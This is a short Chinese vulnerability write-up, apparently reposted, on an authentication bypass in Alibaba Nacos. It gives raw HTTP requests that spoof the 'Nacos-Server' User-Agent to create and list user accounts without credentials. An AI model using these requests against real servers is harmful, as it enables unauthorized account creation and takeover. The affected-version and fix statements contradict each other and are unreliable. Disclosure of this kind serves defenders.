阿里Nacos安全漏洞以绕过身份验证

Posted MWH攻防实验室

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了阿里Nacos安全漏洞以绕过身份验证相关的知识,希望对你有一定的参考价值。

0x01 漏洞描述


      nacos最新版本1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制,依然存在绕过问题,在nacos开启了serverIdentity的自定义key-value鉴权后,通过特殊的url构造,依然能绕过限制访问任何http接口。



0x02 漏洞影响版本



     nacos< 1.4.1



0x03 漏洞复现


    1、访问网站

          

  2、构造参数

        

1、添加用户,密码 

POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1Host: xxxx.comUser-Agent: Nacos-ServerContent-Length: 0Accept: */*Accept-Encoding: gzip

阿里Nacos安全漏洞以绕过身份验证

    2、验证是否添加成功

GET /nacos/v1/auth/users?pageNo=1&pageSize=999 HTTP/1.1Host: xxxx.comUser-Agent: Nacos-ServerAccept: */*Accept-Encoding: gzip


阿里Nacos安全漏洞以绕过身份验证

     

3、进行登录(test/test)


    

4、登录成功



0x04:修复建议


2021年1月14日 Nacos 1.4.1刚发布,会直接在1.4.1进行hotfix。

请用户直接下载最新的1.4.1版本进行部署升级。

https://github.com/alibaba/nacos/releases/tag/1.4.1


以上是关于阿里Nacos安全漏洞以绕过身份验证的主要内容,如果未能解决你的问题,请参考以下文章

留后门?Nacos被爆存在严重的旁路身份验证安全漏洞!

nacos身份绕过漏洞

阿里 Nacos 惊爆安全漏洞,火速升级!

阿里Nacos安全漏洞,火速升级(附修复建议)

Nacos 1.4.1发布,修复指定特殊UA可绕过所有鉴权的安全漏洞

Nacos身份绕过漏洞(QVD-2023-6271)复现学习